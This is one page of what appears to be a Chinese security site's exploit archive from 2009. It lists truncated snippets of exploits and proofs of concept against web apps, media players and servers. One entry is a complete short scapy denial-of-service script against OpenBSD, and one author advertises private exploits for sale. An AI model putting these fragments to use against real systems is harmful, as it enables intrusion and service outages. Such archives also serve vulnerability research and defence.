首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
DNS Tools PHP Digger remote command execution exploit that acts like an interact
  日期:2009-04-20 11:32:52 点击:68 评论:0
?php/* * DNS Tools (PHP Digger) Remote Command Execution (Interactive Shell) * * Author: Ricardo Almeida * email: ricardojba[at]aeiou[DoT]pt * * Credits: www.mortal-team.org * */ function wrap($url){ $ua = array('Mozilla','Opera','Microsoft Inte
Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC
  日期:2009-04-20 10:49:23 点击:81 评论:0
#! /usr/bin/perl #CAL_gdiplug_poc.pl # # Mircosoft_gdiplug_png_infinity_loop_D.o.S POC # by Code Audit Labs public 2009-04-17 # http://www.vulnhunt.com/ # #Affected #======== #test on full updated winxp sp3 #other version should be affected # #CVE:
Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
  日期:2009-04-20 10:47:29 点击:53 评论:0
#! /usr/bin/perl # CAL_quartz_mid_poc.pl # # MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC # by Code Audit Labs public 2009-04-17 # http://www.vulnhunt.com/ # #Affected #======== #test on full updated winxp sp3 #windows media Player 10.00.00.
The Miniweb webserver suffers from a buffer overflow vulnerability when a URI lo
  日期:2009-04-17 11:48:28 点击:28 评论:0
################### Miniweb Remote Buffer Overflow ####################################By: e.wiZz!########Site: www.balcansecurity.com######## Found with ServMeNot (world's sexiest fuzzer :P )In the wild...###########################################
Apache Geronimo Application Server versions 2.1 through 2.1.3 suffer from multip
  日期:2009-04-17 11:46:12 点击:38 评论:0
Original Advisory: http://dsecrg.com/pages/vul/show.php?id=120Digital Security Research Group [DSecRG] Advisory #DSECRG-09-020Application: Apache Geronimo Application ServerVersions Affected: 2.1 - 2.1.3Vendor URL: http://geronimo.apache.org/Bug: Mu
MagicISO CCD/Cue Local Heap Overflow Exploit PoC
  日期:2009-04-17 11:34:11 点击:73 评论:0
#!/usr/bin/perl # # MagicISO CCD/Cue Local Heap Overflow Exploit Poc # ---------------------------------------------------------------- # Mountassif Moad # Stack .. # Cyber-Zone .. # # Private exploits for Kayako, contact me if anyone want buy it :d
eLitius 1.0 (manage-admin.php) Add Admin/Change Password Exploit
  日期:2009-04-17 11:33:16 点击:47 评论:0
title Powered by eLitius Version 1.0 Change Password /title form action= http://esyndicat.org/admin/manage-admin.php method=post name=adminForm table class=admintable tbodytr td table class=adminform cellpadding=0 cellspacing=0 tbody tr th colspan=2
Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes
  日期:2009-04-17 11:32:12 点击:138 评论:0
Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] Systems Affected APEX 3.0 (optional component of 1
webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability
  日期:2009-04-17 11:30:26 点击:121 评论:0
*********************************************************************************************** *********************************************************************************************** ** ** ** ** ** [] [] [] [][][][ [] [] [][ ][] [] [][]] []
Elecard AVC HD Player .XPL Stack Buffer Overflow (SEH) PoC
  日期:2009-04-17 11:25:40 点击:30 评论:0
/*ELECARD AVC HD PLAYER STACK BUFFER OVERFLOW ( SEH OVERWRITE ) Name: elecard.c CREDITS: the one and only fl0 fl0w 004533AE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS SEH chain of main thread Address SE handler 0012CB54 FFFFFFFF Open in debugg
Apollo 37zz (M3u File) Local Heap Overflow PoC
  日期:2009-04-17 11:24:37 点击:28 评论:0
#!/usr/bin/perl # # # ******************************************************************************* # * Apollo 37zz (.M3U File) Local Heap Overflow PoC * # ******************************************************************************* # # Found B
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
  日期:2009-04-17 11:17:05 点击:51 评论:0
?php /* Geeklog = 1.5.2 savepreferences()/*blocks[] remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see u
Zervit Webserver 0.02 Remote Buffer Overflow PoC
  日期:2009-04-16 11:56:40 点击:25 评论:0
#################### Zervit Webserver 0.02 Buffer Overflow ############################ ############### By: e.wiZz! ###############Site: www.balcansecurity.com ############### Found with ServMeNot (world's sexiest fuzzer :P ) In the wild... ########
MS Windows Media Player (.mid File) Integer Overflow PoC
  日期:2009-04-16 11:55:50 点击:31 评论:0
#! /usr/bin/perl # # Windows Media Player (.mid file) Integer Overflow PoC # By HuoFu # # Test Windows Media Player. Ver: 11.0.5721.5260 # open(Fin, crash.mid) || die can't create crash sample.$!; $data = x4dx54x68x64x00x00x00x06x00x01x00
Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit
  日期:2009-04-16 11:54:33 点击:51 评论:0
/* :::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP` YmmMMMM MMM YM [ Discovered and Exploited by dun ] [ Star Downloader Free = v1.45 ] (.dat) Universal SEH Overwr
PowerCHM 5.7 (Long URL) Local Stack Overflow PoC
  日期:2009-04-15 11:06:56 点击:33 评论:0
html body br font style=font-family:arial;font-size:24pxPowerCHM 5.7 (Long url) Local stack overflow (SEH) POC/fontbr font style=font-family:arial;font-size:19pxfound By SuB-ZeRo ( fbh@hotmail.com ) thnaks to hisok4/fontbr br hr size=3 width=500 col
OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit
  日期:2009-04-15 11:05:54 点击:57 评论:0
import sys from scapy import * victim=sys.argv[1] icmpv6=58 p=IP(dst=victim) p.proto=icmpv6 sr(p,timeout=1)
Steamcast 0.9.75b Remote Denial of Service Exploit
  日期:2009-04-15 11:05:12 点击:32 评论:0
#!/usr/bin/perl #Steamcast 0.9.75 beta Remote Denial of Service #Download :http://www.steamcast.com #Tested Under Windows XP and linux #Dork for test :Powered By Steamcast 0.9.75 beta #Author: ksa04 use strict; use warnings; use IO::Socket; my $host
Easy RM to MP3 Converter Universal Stack Overflow Exploit
  日期:2009-04-15 11:04:30 点击:20 评论:0
#!/usr/bin/python # Easy RM to MP3 Converter Universall Stack Overflow Exploit # By Stack # hihihi # StaKer : Only Fabri Fibra :d header = ( x5Bx70x6Cx61x79x6Cx69x73x74x5D x0Ax4Ex75x6Dx62x65x72x4Fx66x45 x6Ex74x72x69x65x73x
Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit
  日期:2009-04-15 11:03:30 点击:36 评论:0
#!/usr/bin/perl # Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit # By AlpHaNiX [NullArea.Net] # alpha[at]hacker.bz # Made in Tunisia ########### # program : Shadow Stream Recorder # download : http://www.rm-to-mp3.net/down
共637页/12733条记录 首页 上一页 [462] [463] [464] 465 [466] [467] [468] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved